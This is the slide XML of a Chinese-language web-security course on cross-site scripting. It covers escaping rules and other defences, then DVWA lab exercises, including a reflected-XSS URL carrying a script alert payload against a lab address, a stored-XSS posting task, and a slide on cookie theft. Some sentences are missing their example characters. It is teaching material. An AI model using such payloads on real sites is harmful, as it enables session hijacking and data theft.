            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被正确引号，需要通过相应的引号来闭合。不带引号的属性可以被分割为许多字符，包括另外，一个闭合标签可以闭合脚本块，即使它是一个带引号的字符串。需要注意的是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析器在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析器</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2467442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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防范</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（续）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>路径进行转义而不是完整的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。总是为属性加上引号，无论是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但不要使用反引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(  ` )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。绝不允许或包含格式像或或者他们的组合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>除了字母数字字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用格式转义所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的字符。如果或属性被正确的引号起来，突破需要对应的引号。未被引号属性可以使用许多字符进行突破，包括和。请注意，这种情况下，实体编码是无用的。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4239612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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防范</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（续）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>样式属性内的不可信字符串先做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>字符串转义，然后进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>转义，因为解析器的解析顺序是先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>解析器然后再</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>解析器。总是给你的属性加上引号，如本例子中的风格属性加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>( “ ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>字符串加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>( ‘ ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，不要使用反引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(  ` )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。为在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中的不可信字符串做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>字符串转义。也要确保不可信字符串在引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>( ‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>或“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>之间，不要使用反引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(  ` )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。也不要允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>以及它的复杂组合，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>expre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/**/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ssion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>除了字母数字字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>用格式转义所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>值小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的字符。不要使用任何类似的转义符号，因为引号符号可能被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>属性解析器在第一次运行被匹配。这些转义字符也容易受到”转义已转义”的攻击，攻击者发送和漏洞代码转为使得可以成为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>引</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>号。如果属性被正确引号，需要通过相应的引号来闭合。不带引号的属性可以被分割为许多字符，包括。同时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>标签会关闭风格块，即使是在一个被引号的字符串内。请注意，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>解析器在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>解析器前运行。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8597533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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防范</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（续）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串中不可信的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，先执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转义，然后执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串转义，保持这个顺序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>创建个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用程序应该允许的来自用户的标签和属性的白名单。黑名单可以很容易的被绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UTF-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为默认的字符编码以及设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>text/html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不要将用户可以控制的文本放在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;meta&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标签前。通过使用不同的字符集注射可以导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="mr-IN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;!DOCTYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>告诉你的浏览器遵循标准进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的渲染以及如何执行</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8605541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反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞实验（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编写一个简单的链接，弹出</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://192.168.1.64/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss_r</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/?name=a%3Cscript%3Ealert%281%29%3C%2Fscript%3E#</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11508049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反射式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞实验（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编写一个链接，可以提交其它页面的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Vulnerability: Stored Cross Site Scripting (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>页面多一条记录：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为你自己的名字</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Message</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为你学的课程名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6015613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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="64798"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="20340742">
            <a:off x="3495108" y="969382"/>
            <a:ext cx="4135325" cy="3130481"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13228731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跨站脚本漏洞风险</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>盗取用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，然后伪造用户身份登录，泄漏用户个人身份及用户订单信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>操控用户浏览器，借助其他漏洞可能导致对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
